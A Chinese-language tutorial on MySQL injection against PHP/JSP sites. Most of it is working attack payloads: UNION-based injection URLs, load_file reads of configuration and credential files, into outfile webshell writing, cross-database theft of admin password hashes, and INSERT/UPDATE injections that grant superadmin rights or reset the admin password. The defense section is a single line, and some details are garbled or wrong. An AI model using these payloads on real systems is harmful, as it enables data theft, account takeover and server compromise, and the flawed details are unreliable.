MySQL注射攻击与防范详解

 

PHP+MySQL JSP+MySQL  一.基础知识  1.MYSQL的版本  4.0以下，4.0以上，5.0以上。  4.0以下不支持union查询  4.0以上magic_quotes_gpc默认为on  5.0以上可以暴表暴列，支持跨库  2.magic_quotes_gpc=on  当php.ini里的 magic_quotes_gpc 为On 时。提交的变量中所有的 ' (单引号), " (双引号), \(反斜线) and 空字符会自动转为含有反斜线的转义字符。例如'会变成\'。给注入带来不少的阻碍。  3.注释符  Mysql有3种注释句法  # 注射掉注释符后面的本行内容  -- 注射效果同#  /* ... */  注释掉符号中间的部分  对于#号将是我们最常用的注释方法。  -- 号记得后面还得有一个空格才能起注释作用。  /*...*/  我们一般只用前面的/*就够了。  注意：在浏览器地址栏输入#时应把它写成%23，这样经urlencode转换后才能成为#，从而起到注释的作用。  注射中常用/**/代替空格。  4.一些函数与MSSQL中的不同  ascii()  length()  5.导出文件（into outfile）  使用  into outfile 把代码写到web目录取得WEBSHELL    首先需要 3大先天条件  ①知道物理路径(into outfile '物理路径') 这样才能写对目录  ②能够使用union (也就是说需要MYSQL4以上的版本)  ③对方没有对'进行过滤(因为outfile 后面的 '' 不可以用其他函数代替转换)  后天条件就要2个  ①就是MYSQL 用户拥有file_priv权限(不然就不能写文件 或者把文件内容读出)  ②对web目录有写权限MS 的系统就不说了一般都会有权限的~但是*nix 的系统嘛！通常都是rwxr-xr-x 也就是说组跟其他用户都没有权限写操作  6.读取文件（load_file()）  serv-U默认安装路径的servudaemon.ini。注意可以变化D盘，E盘……  读取数据库配置文件  IIS站点配置信息，c:\windows\system32\inetsrv\metabase.xml  /usr/local/app/apache2/conf/httpd.conf //apache2缺省配置文件  /usr/local/apache2/conf/httpd.conf  /usr/local/app/php5/lib/php.ini //PHP相关设置  /usr/local/app/apache2/conf/extra/httpd-vhosts.conf //虚拟网站设置  /etc/my.cnf //mysql的配置文件  /etc/redhat-release //系统版本  C:\mysql\data\mysql\user.MYD //us存储了mysql.er表中的数据库连接密码  /etc/sysconfig/iptables //从中得到防火墙规则策略  7.绝对路径  1.加特殊符号，访问不存在的链接  2.读取服务器配置文件  3.直接访问  phpmyadmin/libraries/select_lang.lib.php  phpmyadmin/darkblue_orange/layout.inc.php  phpmyadmin/index.php?lang[]=1  8.网站OS版本  变换大小写。  9.PHPMyadmin路径  在测试uninx系统中phpmyadmin路径时候可以在upload/2011/5/201105170148018831.jpg  2004091201.jpg中的内容为 一句话  好，我们开始upload/2011/5/201105170148026134.jpg'),4,5,6,7,8,9,10,11%20into%20outfile'C:/apache/htdocs/site/shell.php'  因为适用了outfile，所以网页显示不正常，但是我们的任务是完成了。  load_file读写文件的技巧  不知道你有没有发现过在我们用load_file()读写php文件时不能在网页中显示。例如：  'C:/apache/htdocs/site/lib/sql.inc.php'转化为16进制为：0x433A2F6170616368652F6874646F63732F736974652F6C69622F73716C2E696E632E706870  我们构造如下  http://localhost/site/display.php?id=451%20and%201=2%20%20union%20select%201,2,load_file(0x433A2F6170616368652F6874646F63732F736974652F6C69622F73716C2E696E632E706870),4,5,6,7,8,9,10,11  发现在文章内容的地方本来该显示sql.inc.php的，可是却空空之，为何呢？ 内容在源代码里面。  substring() left() right() mid()  into outfile'' 不能绕过  mysql 5.0以下的跨库查询  变相的跨库查询，方法就是通过load_file来直接读出mysql中data文件夹下的文件内容，从而实现变态跨库查询。  举个例子啦  在这之前我们先讲一下mysql的data文件夹下的结构  Data文件夹下有按数据库名生成的文件夹，文件夹下按照表名生成三个后缀为frm,myd,myi的三个文件，例如  Mysql中有alpha数据库，在alpha库中有alphaauthor和alphadb两个表，  Alpha文件夹下就有alphadb.frm，alphadb.myd，alphadb.myi，alphaauthor.frm,alphaauthor.myd,alphaauthor.myi  其中alphadb.frm放着lphadb表中的数据，alphadb.myd放着表的结构，alphadb.myi中放的内容随mysql的版本不同会有所不同，具体可以自己用记事本打开来判断。  实验开始  假设我们知道有另外的一个数据库yminfo210存在，且存在表user，user中放着admin的信息。  我们  http://localhost/site/display.php?id=451%20and%201=2%20%20union%20select%201,2,load_file('yminfuo210/ser.myd'),4,5,6,7,8,9,10,11  说明一下，load_file默认所在的目录是mysql下的data目录，所以我们用  load_file('yminfo210/user.myd')，当然load_file('.info210/user.myd')也是一样的，注意的是into outfile的默认路径是在所在的数据库文件夹下。  我们看读出来的内容  �|�FF�FF?   admin 698d51a19d8a121ce581499d7b701668 [email protected] sdfasdfsdfa asdfadfasd   ?E�KAM�KA 127.0.0.1 222  222222223423  虽然乱码一堆，但是我们还是可以看出用户名是admin，密码是698d51a19d8a121ce581499d7b701668，后面其它的是另外的信息。  通过这种方法我们就实现了曲线跨库。  3.其他一些注射语句（insert注射和update注射）  INSERT    如果大家认为MYSQL中注入仅仅适用于SELECT就大错特错了，其实还有两个危害更大的操作，那就是INSERT和UPDATE语句，这类例子不多，先面先说说INSERT，这主要应用于改写插入的数据，我们来看个简单而又广泛存在的例子，看看下面的数据结构：  CREATE TABLE 'user' (  'userid' INT NOT NULL AUTO_INCREMENT ,  'username' VARCHAR( 20 ) NOT NULL ,  'password' VARCHAR( 50 ) NOT NULL ,  'homepage' VARCHAR( 255 ) NOT NULL ,  'userlevel' INT DEFAULT '1' NOT NULL ,  PRIMARY KEY ( 'userid' )  );    其中的userlevel代表用户的等级，1是普通用户，2是普通管理员，3是超级管理员，一个注册程序默认是注册成普通用户，如下：  INSERT INTO 'user' (userid, username, password, homepage, userlevel) VALUES ('', '$username', '$password', '$homepage', '1');    默认userlevel字段是插入1，其中的变量都是没有经过过滤就直接写入数据库的，不知道大家有什么想法？对，就是直接注入，使我们一注册就是超级管理员。我们注册的时候，构造$homepage变量，就可以达到改写的目的，指定$homepage变量为：  http://4ngel.net', '3’)#    插入数据库的时候就变成：  INSERT INTO 'user' (userid, username, password, homepage, userlevel) VALUES ('', 'angel', 'mypass', 'http://4ngel.net', '3’)#', '1');    这样就注册成为超级管理员了。但这种利用方法也有一定的局限性，比如，我没有需要改写的变量如userlevel字段是数据库的第一个字段，前面没有地方给我们注入，我们也没有办法了。  或许INSERT还有更广泛的应用，大家可以自行研究，但原理都是一样的。  UPDATE    和INSERT相比，UPDATE的应用更加广泛，如果过滤不够，足以改写任何数据，还是拿刚才的注册程序来说，数据结构也不变，我们看一下用户自己修改自己的资料，SQL语句一般都是这样写的：  UPDATE user SET password='$password', homepage='$homepage' WHERE id='$id'    用户可以修改自己的密码和主页，大家有什么想法？总不至于还是提升权限吧？程序中的SQL语句又没有更新userlevel字段，怎么提升啊？还是老办法，构造$homepage变量, 指定$homepage变量为：  http://4ngel.net', userlevel='3    整个SQL语句就变成这样：  UPDATE user SET password='mypass', homepage='http://4ngel.net', userlevel='3' WHERE id='$id'    我们是不是又变成超级管理员了？程序不更新userlevel字段，我们自己来。  还有更加绝的，直接修改任意用户的资料，还是刚才的例句，但这次安全一点，使用MD5加密：  UPDATE user SET password='MD5($password)', homepage='$homepage' WHERE id='$id'    尽管密码被加密了，但我们还是可以构造我们需要的语句，我们指定$password为：  mypass)' WHERE username='admin'#    这时整个语句变为：  UPDATE user SET password='MD5(mypass)' WHERE username='admin'#)', homepage='$homepage' WHERE id='$id'    这样就更改了更新的条件，我管你后面的代码是不是在哭这说：我们还没有执行啊。当然，也可以从$id下手，指定$id为：  ' OR username='admin'    这时整个语句变为：  UPDATE user SET password='MD5($password)', homepage='$homepage' WHERE id='' OR username='admin'  4.MySQL5.0以上的新特性  系统表的结构  SCHEMATA         �D�D>存储数据库名的，  |——>关键字段：SCHEMA_NAME，表示数据库名称                          | TABLES              �D�D>存储表名的    |——>关键字段：TABLE_SCHEMA表示表所属的数据库名称；  TABLE_NAME表示表的名称  | COLUMNS   �D�D>存储字段名的  |——>关键字段：TABLE_SCHEMA表示表所属的数据库名称；  TABLE_NAME表示所属的表的名称               COLUMN_NAME表示字段名  爆管理员账号密码找到后台登陆。  前面爆管理员账号密码前有可能猜表都猜不到。这里教大家暴库，爆表，爆字段。  http://127.0.0.1/ad.php?id=1 and 1=2 union select 1,2,3,4,schema_name,6,7,8 from information_schema.SCHEMATA limit 0,1/*  这样会爆出一个数据库。前面我们轻而易举的可以得到一个当前连接的数据库。  我们要爆出的数据库里要存放管理员的用户和密码。  这里limit 0,1/*的意思是爆出第一个库的名字，如果要查看第二个数据库名就增加limit后面的值，比如把0增加为1就又爆出一个库名。逐次加1就分别暴出了网站的其他数据库名。  已经知道网站数据库名是study，继续爆表。  http://127.0.0.1/ad.php?id=1 and 1=2 union select 1,2,3,4,table_name,6,7,8 from information_schema.table where TABLE_SCHEMA=0x7374756479 limit 0,1/*  这里0x7374756479就是study的16进制形式。成功爆出一个表名。我们在增加limit后面的数字来逐一爆出数据库中的其他表名。  爆字段  http://127.0.0.1/ad.php?id=1 and 1=2 union select 1,2,3,4,COLUMN_NAME,6,7,8 from information_schema.COLUMN_NAME where TABLE_NAME=0x61646D696E limit 0,1/*  成功爆出admin表中的一个字段。0x61646D696E为admin的16进制。  有时候我们用union联合查询前猜到的字段长度可能是1，这样对我们就有所限制了。我们可以借助concat函数来一次性爆出我们所希望得到的东西。具体用法是concat(我们想要爆的,0x3A,我们想要爆的,0x3A,我们想要爆的……)  http://127.0.0.1/ad.php?id=1 and 1=2 union select concat(user(),0x3A,database(),0x3A,version())  0x3A是;的16进制形式。  PHP跨库查询。当前库realmd，要跨到BBS的库为discuz,默认中discuz数据库中存放用户信息的表是cdb_members ,两个字段为username,password  http://127.0.0.1/ad.php?id=1 and 1=1 union select 1,2,3,4,5,6,7,8 from discuz.cdb_members返回正常，说明跨库查询成功。并且数据库和表都是存在的。  http://127.0.0.1/ad.php?id=1 and 1=2 union select 1,username,3,password,5,6,7,8 from discuz.cdb.members where uid=1  延伸——跨库后同样可以爆表爆字段。  http://127.0.0.1/ad.php?id=1 and 1=2 union select 1,2,3,4,table_name,6,7,8 from information_schema.table where TABLE_SCHEMA=discuz limit 0,1/*  http://127.0.0.1/ad.php?id=1 and 1=2 union select 1,2,3,4,COLUMN_NAME,6,7,8 from information_schema.COLUMN_NAME where TABLE_NAME=discuz.cdb_members limit 0,1/*  schema_name  information_schema.SCHEMATA  table_name  information_schema.table  TABLE_SCHEMA  COLUMN_NAME  information_schema.COLUMN_NAME  TABLE_NAME  三.攻击思路  如果magic_quotes_gpc=off 尝试into outfile直接得到一个shell  判断数据库版本，可以尝试各个版本的溢出漏洞  如果能load_file，可以load_file出数据库的账户密码  连接或者是找到phpmyadmin后登陆  登陆后创建一个表，导出一个shell或者into outfile 一个shell  也可以load_file serv-U的相关信息，利用FTP登陆  猜测管理员账户密码找到后台登陆获得shell  本库不行，可以跨库。  四.漏洞防御  变量的过滤  开启magic_quotes_gpc并且int型变量做一个判断。